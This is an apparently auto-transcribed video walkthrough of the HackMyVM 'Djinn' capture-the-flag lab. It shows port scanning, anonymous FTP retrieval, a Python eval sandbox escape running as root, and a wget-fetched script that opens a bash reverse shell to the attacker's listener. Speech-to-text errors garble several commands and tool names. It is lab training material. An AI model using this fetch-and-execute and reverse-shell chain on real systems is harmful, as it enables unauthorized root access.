Yo, what's going on, guys? In this video, we're going to be doing Djinn from HackMyVm. This is box word about super easy. And yeah, let's get on to the video. So I'm going to put my terminals here. So we're running a Netscope my SR 10.0.0.1/24/IT0. Doing this, we do type the box 10.0.0.156. So do Control-Shift-Z, so boot mmap scan. So do mmap -sc for default scripts, -sv for permission, it's kind of ports on the IP. Doing this, I'll do -v verbose. Looking at the ports, we have port 22 open for SSH, port 21 open for FTP, port 7331 for TCP, and port 1337 for TCP. Since we have port 21 open for FTP, I'm just going to use wget to do recursive mode. So do wget -r, we'll do FTP 10.0.0.156 on port 21. Now we do have a directory with all the files. It does seem like we do have a creds.txt, game.txt, also message.txt. I'm just going to count this game.txt and also this message.txt. Doing this, it does seem like we do have a username, also a password. Also do have a game set up on port 1337, so maybe we can do like a banner grab on 1337. And seem like about it. Start by doing a banner grab, so do netcat-v on 10.0.0.156 on port, we did have this on port 1337, I believe. So here we do have a 6 divided by 6, which is 1. So we have 9 minus 5, which is 4, I believe. Yeah, it's 4. So doing this, if we do type in something random, it does seem like this is a Python sandbox, since we do have basically just the syntax. We do have parentheses, 6 comma, which followed by a division, comma 6. It does seem like this is Python syntax. Pretty obvious. We do have 9 minus 5, which is 4. We do have the, put this in quotes, comma for each number. It's pretty obvious this is Python syntax. So I'm just going to do Python. We'll do a sandbox. We'll just do escape. So looking at this, we can search starbars looking for execute. So we can, which is this eval. So I'm just going to copy this. And we also do have the command for dir. I'm just going to change this to ID to see what user we do have. I'm going to run that banner grab one more time. You do see that we are under root. So it means this service is listing on as root. So we can start by executing commands as root. So I'm just going to start up a Python server. From there, I'm just going to use wget to create the shell onto the server and just execute a reverse shell. So I'll do a wget http 10.0.0.69 on port 881. 881, we're going to be in that execute.sh. I'm just going to output this to /temp execute.sh. And we'll just run the and command. You could also run this with just a semicolon, but it's not going to check if this command did execute successfully. So I'm just going to run and. Once we do have and, we're going to just run a chmod +x for execute.sh. And one more time, run a bash against /temp execute.sh. So we're going to wget from our server, get this execute.sh, output it to execute.sh, chmod. We do need to specify the path for temp execute, since we're going to output it to temp execute, and then run that bash against temp execute. So doing this, I'm just going to copy this, put this in here. I'm starting my Python server. So I'm going to be into shell.sh. We didn't know that we did have this as execute.sh. I'm just going to start by specifying the path for bin/bash. I'm just going to go to, we'll go to pentest monkey. We did have this for bash. So we did know it's 10.0.0.69. We'll listen on port 9001. So I'm just going to write quit. So do Python 3 -m http.server on port 881. We're going to be getting the execute.sh. So I'm going to start my listener. So do all wrap netcat-mvp on 9001. So we can press it on that. We did mess it up because I put 10.0.0.169. 10.0.0.69. We can do the bad grab one more time. You do see that I did get the execute.sh. I did put it under /temp. If I do go under /temp, you do see that we do have a reverse shell. So we can cd into root, ls, and cat root.txt. Well, guys, that's pretty much the video. Don't forget to like and subscribe. And I'll catch you guys in the next one. Peace.